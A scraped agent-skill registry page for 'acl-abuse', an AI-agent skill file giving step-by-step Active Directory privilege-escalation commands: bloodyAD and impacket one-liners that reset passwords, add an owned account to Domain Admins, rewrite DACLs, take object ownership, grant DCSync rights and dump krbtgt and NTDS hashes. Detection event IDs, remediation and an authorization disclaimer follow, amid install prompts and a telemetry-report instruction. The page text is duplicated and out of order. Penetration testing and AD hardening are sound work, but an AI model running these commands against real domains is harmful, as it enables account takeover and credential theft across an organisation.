Take ownership (impacket owneredit): ``` owneredit.py -action write -new-owner owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ``` Then grant yourself full control with dacledit (as above), then exploit as GenericAll.
bloodyAD one-liner for ownership: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set owner 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## Replication rights → DCSync (POST-COMPROMISE ONLY)
**MITRE ATT&CK:** T1003.006 (OS Credential Dumping: DCSync)
**Frame this correctly.** DCSync is **not a user entry path**. It is a post-compromise credential-extraction technique performed by a principal that *already holds* the directory replication extended rights, `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`, on the domain object. In a healthy domain those rights belong only to Domain Controllers and to Domain/Enterprise Admins, so being able to DCSync normally means you are already Domain Admin (or the equivalent). It matters to ACL abuse only in one specific case: **a non-DC, non-admin principal has been mis-granted those replication rights**, usually as the *result* of a WriteDACL/WriteOwner chain above. In that case DCSync is the payoff of the ACL abuse, still executed after you have obtained (or granted yourself) the replication rights, never before.
So the ACL entry point is the mis-granted right (or granting it to yourself via WriteDACL on the domain object); the DCSync itself is the follow-on.
Grant the replication rights (only if you have WriteDACL on the domain head, the abusable misconfiguration): ``` dacledit.py -action write -rights DCSync -principal owneduser \ -target-dn 'DC=corp,DC=local' -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
Then, holding those rights, replicate secrets (impacket secretsdump): ``` secretsdump.py -just-dc-user 'CORP\krbtgt' CORP.LOCAL/owneduser:'Password123'@10.0.0.10 secretsdump.py -just-dc CORP.LOCAL/owneduser:'Password123'@10.0.0.10 # full dump ``` netexec equivalent: ``` nxc smb 10.0.0.10 -u owneduser -p 'Password123' --ntds ```
Dumping `krbtgt` enables Golden Tickets; dumping the Administrator hash enables pass-the-hash. Both are post-DA persistence, not entry.
---
## Detection (Event IDs)
- **5136**: a directory object was modified. This is the central ACL-abuse event: it fires on DACL changes, group membership changes, SPN writes, `userAccountControl` flips, RBCD writes, and owner changes. Watch the `AttributeLDAPDisplayName` (e.g. `nTSecurityDescriptor`, `member`, `servicePrincipalName`, `msDS-AllowedToActOnBehalfOfOtherIdentity`). - **5137/5139/5141**: object created/moved/deleted, for the surrounding activity. - **4662**: an operation was performed on an object. For DCSync, look for 4662 with the replication control access GUIDs `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes) and `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes-All) requested by a principal that is **not** a Domain Controller, which is the tell that a non-DC is replicating. - **4738**: a user account was changed (attribute-level). - **4728/4732/4756**: a member was added to a security-enabled group. - Microsoft Defender for Identity raises "Suspected DCSync attack" on replication from a non-DC.
---
## Remediation to write up
- **Audit ACEs.** Enumerate non-default ACEs across users, groups, computers, OUs and the domain head. Any GenericAll/GenericWrite/WriteDacl/WriteOwner held by a non-Tier-0 principal over a privileged object is a finding. - **Strip replication rights from everything that is not a DC.** Only Domain Controllers and the intended Tier-0 admins should hold `DS-Replication-Get-Changes-All`. Remove it from every user/group/service account that has it. - **Protect the domain head DACL.** `WriteDacl`/`WriteOwner` on `DC=corp,DC=local` is game over; lock it to Tier-0. - **Set `MachineAccountQuota` to 0** to kill the RBCD-via-new-computer variant. - Alert on 5136 changes to security descriptors and to `member` on privileged groups; alert on 4662 replication access from non-DCs. - Use tiered administration so the graph has no low-priv-to-Tier-0 edges in the first place.
Only exploit ACLs on systems you are authorized to test. Password resets are disruptive; coordinate. Use lab/generic DNs and names in write-ups.
---
## Reference
- DACL abuse (GenericAll/GenericWrite/WriteDacl/WriteOwner/AddMember): https://www.thehacker.recipes/ad/movement/dacl/ - Targeted Kerberoasting: https://www.thehacker.recipes/ad/movement/kerberos/roasting/kerberoast - DCSync: https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for acl-abuse, ready for a manual X post.
A practical pick for a repeatable workflow: acl-abuse: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWri... 153 stars https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x
Listing + install path for acl-abuse: https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x Install: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to ADScanPro but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse/audit)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)ADScanPro
@adscanpro
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Sandbox only
stop-slop
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
16.3K StarsHumanizer
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
37.4K Starsno-ai-slop
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
5.8K Starsunslop
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
4.8K StarsSandbox only
Install targets
Codex install prompt
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"adscanpro-acl-abuse","task":"Install acl-abuse","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Code review, repo analysis, testing, CI, GitHub, DevOps, and developer workflow skills.
Scenario
Testing and QA
I need my agent to test a web app, reproduce bugs, and verify fixes.
Agent fit
Claude Code + CLI + Codex
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Maintenance
fresh
12d since push
Risk
Needs review
Permission surface may require sandboxing
GitHub quality
153
68/100 Quality · 77/100 Trust
Coverage tags
Review notes
Permission surface may require sandboxing · Quality score needs review
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
PromisingUseful candidate, but compare it with alternatives before adopting.
Trust
Sandbox onlyUseful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Run only in a sandbox and compare close alternatives before using it for real work.
Stars
153 GitHub stars
Repo activity
153 stars, 24 forks
Maintenance
12d since push
License
MIT
Install
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add ADScanPro/Claude-AD --skill acl-abuseDo not use when
Alternative
16.3K Stars
npx skills add hardikpandya/stop-slop --skill stop-slop
Alternative
37.4K Stars
npx skills add blader/humanizer --skill humanizer
Alternative
5.8K Stars
npx skills add petergyang/no-ai-slop --skill no-ai-slop
Alternative
4.8K Stars
npx skills add cursor/plugins --skill unslop
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
high
Skill metadata references credentials, tokens, environment variables, or secret-bearing workflows.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/adscanpro-acl-abuse/install
Agent should check
Copy prompt
Task: Use acl-abuse in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install
Install command: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/adscanpro-acl-abuse/install
LLM text format
/api/skills/adscanpro-acl-abuse/install?format=text
Find alternatives
/api/skills/search?q=acl-abuse&limit=3
Agent prompt
Use acl-abuse for this task. Review https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install, then install with: npx skills add ADScanPro/Claude-AD --skill acl-abuseRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/adscanpro-acl-abuse
LLM text
/api/registry/manifest/adscanpro-acl-abuse?format=text
Install alias
/api/registry/install/adscanpro-acl-abuse
Recommend
/api/registry/recommend?task=Use%20acl-abuse%20in%20an%20agent%20workflow&limit=3
Agent fit
Browser automation
Platforms
Claude Code
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Prototype with this skill first; keep a fallback candidate ready.
Role in stack
Fallback candidate
Primary fit
Browser automation
Trust label
Prototype first
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Useful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
GitHub adoption
INFO153 GitHub stars
Stars/forks activity
CHECK153 stars, 24 forks; issue activity unavailable in current metadata
Recent maintenance
PASS12d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Run only in a sandbox and compare close alternatives before using it for real work.
Quality profile
Useful candidate, but compare it with alternatives before adopting.
Workflow fit
Operate web apps
I need my agent to control a browser, fill forms, and verify web app workflows.
Reduce risk
I need my agent to scan a project for security risks and summarize what needs attention.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Operate and verify web apps
A workflow for agents that navigate products, fill forms, take screenshots, and verify real user flows across web applications.
Scrape, clean, and reuse web data
A practical workflow for agents that crawl public pages, extract clean content, normalize data, and hand it to downstream research or RAG workflows.
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Alternative shortlist
Similar skills that may fit this task.
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
--- name: acl-abuse description: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. ---
# ACL Abuse
Active Directory permissions are a graph. A single misconfigured Access Control Entry (ACE), say a low-priv user with `GenericAll` over a group, `WriteDacl` over a computer, or `WriteOwner` over an OU, is a directed edge you can walk from where you are toward Domain Admin. This skill turns those edges into concrete commands with **bloodyAD** and **impacket**, after **BloodHound CE** (Apache-2.0, genuinely open source) has drawn the path.
**Find the paths first (BloodHound CE).** Collect with a standard collector, import into BloodHound CE, and look at the outbound control edges from your owned principal: `GenericAll`, `GenericWrite`, `WriteDacl`, `Owns`/`WriteOwner`, `AddMember`, `ForceChangePassword`, `AllExtendedRights`, and `DCSync`. Pre-built queries like "Shortest paths from Owned principals" and "Find principals with DCSync rights" hand you the chain.
Collect edges with a standard collector, for example: ``` nxc ldap 10.0.0.10 -u user -p 'Password123' --bloodhound --collection All --dns-server 10.0.0.10 ``` or run `rusthound-ce` / SharpHound CE and import the ZIP into BloodHound CE.
---
## GenericAll
**MITRE ATT&CK:** T1222 (Permission Modification) / T1098 (Account Manipulation)
**What it is.** Full control over the target object. What you do with it depends on the target type: - **Over a user:** reset their password (ForceChangePassword) or set an SPN and Kerberoast them (targeted roasting), or set `DONT_REQ_PREAUTH` and AS-REP roast. - **Over a group:** add yourself as a member (AddMember). - **Over a computer:** write RBCD (`msDS-AllowedToActOnBehalfOfOtherIdentity`) and impersonate (see the Kerberos skill).
Reset a user's password: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ```
Add yourself to a group: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Domain Admins' owneduser ```
Targeted Kerberoast (set an SPN you control, then roast, see Kerberos skill): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set object TARGETUSER servicePrincipalName -v 'fake/svc' GetUserSPNs.py -request-user TARGETUSER -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
---
## GenericWrite
**MITRE ATT&CK:** T1098
**What it is.** Write non-protected attributes on the target. Enough to set an SPN (targeted Kerberoast), set `DONT_REQ_PREAUTH` (targeted AS-REP roast), or write `msDS-AllowedToActOnBehalfOfOtherIdentity` on a computer (RBCD). Not enough to reset the password directly on a user (that is ForceChangePassword / GenericAll).
Set the preauth-disabled flag for a targeted AS-REP roast: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add uac TARGETUSER -f DONT_REQ_PREAUTH GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/owneduser:'Password123' ```
Write RBCD on a computer you can then S4U through: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add rbcd TARGET$ EVIL$ ```
---
## ForceChangePassword
**MITRE ATT&CK:** T1098
**What it is.** The `User-Force-Change-Password` extended right lets you reset the target user's password without knowing the old one. Straight account takeover of that user.
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ``` impacket alternative: ``` net rpc password TARGETUSER 'NewPass123!' -U 'CORP.LOCAL/owneduser%Password123' -S 10.0.0.10 ```
**Note:** resetting an in-use account is noisy and disruptive; it locks the real user out. Prefer targeted Kerberoast/AS-REP where the edge allows, and coordinate password resets with the client.
---
## AddMember
**MITRE ATT&CK:** T1098
**What it is.** Write access to a group's `member` attribute. Add a principal you control to a privileged group (a nested group that eventually reaches Domain Admins is just as good).
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Backup Operators' owneduser ```
---
## WriteDACL
**MITRE ATT&CK:** T1222.001 (Windows Permission Modification)
**What it is.** You can rewrite the target's DACL, so you grant *yourself* whatever ACE you want (up to full control) and then exploit that. The common escalation is to grant yourself the replication rights on the domain object (setting up DCSync, see below) or GenericAll on a user/group.
Grant yourself an ACE on the target (impacket dacledit): ``` dacledit.py -action write -rights FullControl -principal owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
bloodyAD equivalent (grant a right on an object): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add genericAll 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## WriteOwner / Owns
**MITRE ATT&CK:** T1222.001
**What it is.** You can set yourself as the *owner* of the target object. The owner can always rewrite the DACL, so WriteOwner chains into WriteDACL into full control. Two steps: take ownership, then grant yourself rights.
Take ownership (impacket owneredit): ``` owneredit.py -action write -new-owner owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ``` Then grant yourself full control with dacledit (as above), then exploit as GenericAll.
bloodyAD one-liner for ownership: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set owner 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## Replication rights → DCSync (POST-COMPROMISE ONLY)
**MITRE ATT&CK:** T1003.006 (OS Credential Dumping: DCSync)
**Frame this correctly.** DCSync is **not a user entry path**. It is a post-compromise credential-extraction technique performed by a principal that *already holds* the directory replication extended rights, `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`, on the domain object. In a healthy domain those rights belong only to Domain Controllers and to Domain/Enterprise Admins, so being able to DCSync normally means you are already Domain Admin (or the equivalent). It matters to ACL abuse only in one specific case: **a non-DC, non-admin principal has been mis-granted those replication rights**, usually as the *result* of a WriteDACL/WriteOwner chain above. In that case DCSync is the payoff of the ACL abuse, still executed after you have obtained (or granted yourself) the replication rights, never before.
So the ACL entry point is the mis-granted right (or granting it to yourself via WriteDACL on the domain object); the DCSync itself is the follow-on.
Grant the replication rights (only if you have WriteDACL on the domain head, the abusable misconfiguration): ``` dacledit.py -action write -rights DCSync -principal owneduser \ -target-dn 'DC=corp,DC=local' -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
Then, holding those rights, replicate secrets (impacket secretsdump): ``` secretsdump.py -just-dc-user 'CORP\krbtgt' CORP.LOCAL/owneduser:'Password123'@10.0.0.10 secretsdump.py -just-dc CORP.LOCAL/owneduser:'Password123'@10.0.0.10 # full dump ``` netexec equivalent: ``` nxc smb 10.0.0.10 -u owneduser -p 'Password123' --ntds ```
Dumping `krbtgt` enables Golden Tickets; dumping the Administrator hash enables pass-the-hash. Both are post-DA persistence, not entry.
---
## Detection (Event IDs)
- **5136**: a directory object was modified. This is the central ACL-abuse event: it fires on DACL changes, group membership changes, SPN writes, `userAccountControl` flips, RBCD writes, and owner changes. Watch the `AttributeLDAPDisplayName` (e.g. `nTSecurityDescriptor`, `member`, `servicePrincipalName`, `msDS-AllowedToActOnBehalfOfOtherIdentity`). - **5137/5139/5141**: object created/moved/deleted, for the surrounding activity. - **4662**: an operation was performed on an object. For DCSync, look for 4662 with the replication control access GUIDs `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes) and `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes-All) requested by a principal that is **not** a Domain Controller, which is the tell that a non-DC is replicating. - **4738**: a user account was changed (attribute-level). - **4728/4732/4756**: a member was added to a security-enabled group. - Microsoft Defender for Identity raises "Suspected DCSync attack" on replication from a non-DC.
---
## Remediation to write up
- **Audit ACEs.** Enumerate non-default ACEs across users, groups, computers, OUs and the domain head. Any GenericAll/GenericWrite/WriteDacl/WriteOwner held by a non-Tier-0 principal over a privileged object is a finding. - **Strip replication rights from everything that is not a DC.** Only Domain Controllers and the intended Tier-0 admins should hold `DS-Replication-Get-Changes-All`. Remove it from every user/group/service account that has it. - **Protect the domain head DACL.** `WriteDacl`/`WriteOwner` on `DC=corp,DC=local` is game over; lock it to Tier-0. - **Set `MachineAccountQuota` to 0** to kill the RBCD-via-new-computer variant. - Alert on 5136 changes to security descriptors and to `member` on privileged groups; alert on 4662 replication access from non-DCs. - Use tiered administration so the graph has no low-priv-to-Tier-0 edges in the first place.
Only exploit ACLs on systems you are authorized to test. Password resets are disruptive; coordinate. Use lab/generic DNs and names in write-ups.
---
## Reference
- DACL abuse (GenericAll/GenericWrite/WriteDacl/WriteOwner/AddMember): https://www.thehacker.recipes/ad/movement/dacl/ - Targeted Kerberoasting: https://www.thehacker.recipes/ad/movement/kerberos/roasting/kerberoast - DCSync: https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for acl-abuse, ready for a manual X post.
A practical pick for a repeatable workflow: acl-abuse: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWri... 153 stars https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x
Listing + install path for acl-abuse: https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x Install: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to ADScanPro but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse/audit)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)ADScanPro
@adscanpro
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Sandbox only
stop-slop
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
16.3K StarsHumanizer
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
37.4K Starsno-ai-slop
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
5.8K Starsunslop
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
4.8K StarsSandbox only
Install targets
Codex install prompt
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"adscanpro-acl-abuse","task":"Install acl-abuse","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Code review, repo analysis, testing, CI, GitHub, DevOps, and developer workflow skills.
Scenario
Testing and QA
I need my agent to test a web app, reproduce bugs, and verify fixes.
Agent fit
Claude Code + CLI + Codex
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Maintenance
fresh
12d since push
Risk
Needs review
Permission surface may require sandboxing
GitHub quality
153
68/100 Quality · 77/100 Trust
Coverage tags
Review notes
Permission surface may require sandboxing · Quality score needs review
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
PromisingUseful candidate, but compare it with alternatives before adopting.
Trust
Sandbox onlyUseful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Run only in a sandbox and compare close alternatives before using it for real work.
Stars
153 GitHub stars
Repo activity
153 stars, 24 forks
Maintenance
12d since push
License
MIT
Install
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add ADScanPro/Claude-AD --skill acl-abuseDo not use when
Alternative
16.3K Stars
npx skills add hardikpandya/stop-slop --skill stop-slop
Alternative
37.4K Stars
npx skills add blader/humanizer --skill humanizer
Alternative
5.8K Stars
npx skills add petergyang/no-ai-slop --skill no-ai-slop
Alternative
4.8K Stars
npx skills add cursor/plugins --skill unslop
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
high
Skill metadata references credentials, tokens, environment variables, or secret-bearing workflows.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/adscanpro-acl-abuse/install
Agent should check
Copy prompt
Task: Use acl-abuse in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install
Install command: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/adscanpro-acl-abuse/install
LLM text format
/api/skills/adscanpro-acl-abuse/install?format=text
Find alternatives
/api/skills/search?q=acl-abuse&limit=3
Agent prompt
Use acl-abuse for this task. Review https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install, then install with: npx skills add ADScanPro/Claude-AD --skill acl-abuseRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/adscanpro-acl-abuse
LLM text
/api/registry/manifest/adscanpro-acl-abuse?format=text
Install alias
/api/registry/install/adscanpro-acl-abuse
Recommend
/api/registry/recommend?task=Use%20acl-abuse%20in%20an%20agent%20workflow&limit=3
Agent fit
Browser automation
Platforms
Claude Code
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Prototype with this skill first; keep a fallback candidate ready.
Role in stack
Fallback candidate
Primary fit
Browser automation
Trust label
Prototype first
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Useful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
GitHub adoption
INFO153 GitHub stars
Stars/forks activity
CHECK153 stars, 24 forks; issue activity unavailable in current metadata
Recent maintenance
PASS12d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Run only in a sandbox and compare close alternatives before using it for real work.
Quality profile
Useful candidate, but compare it with alternatives before adopting.
Workflow fit
Operate web apps
I need my agent to control a browser, fill forms, and verify web app workflows.
Reduce risk
I need my agent to scan a project for security risks and summarize what needs attention.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Operate and verify web apps
A workflow for agents that navigate products, fill forms, take screenshots, and verify real user flows across web applications.
Scrape, clean, and reuse web data
A practical workflow for agents that crawl public pages, extract clean content, normalize data, and hand it to downstream research or RAG workflows.
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Alternative shortlist
Similar skills that may fit this task.
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
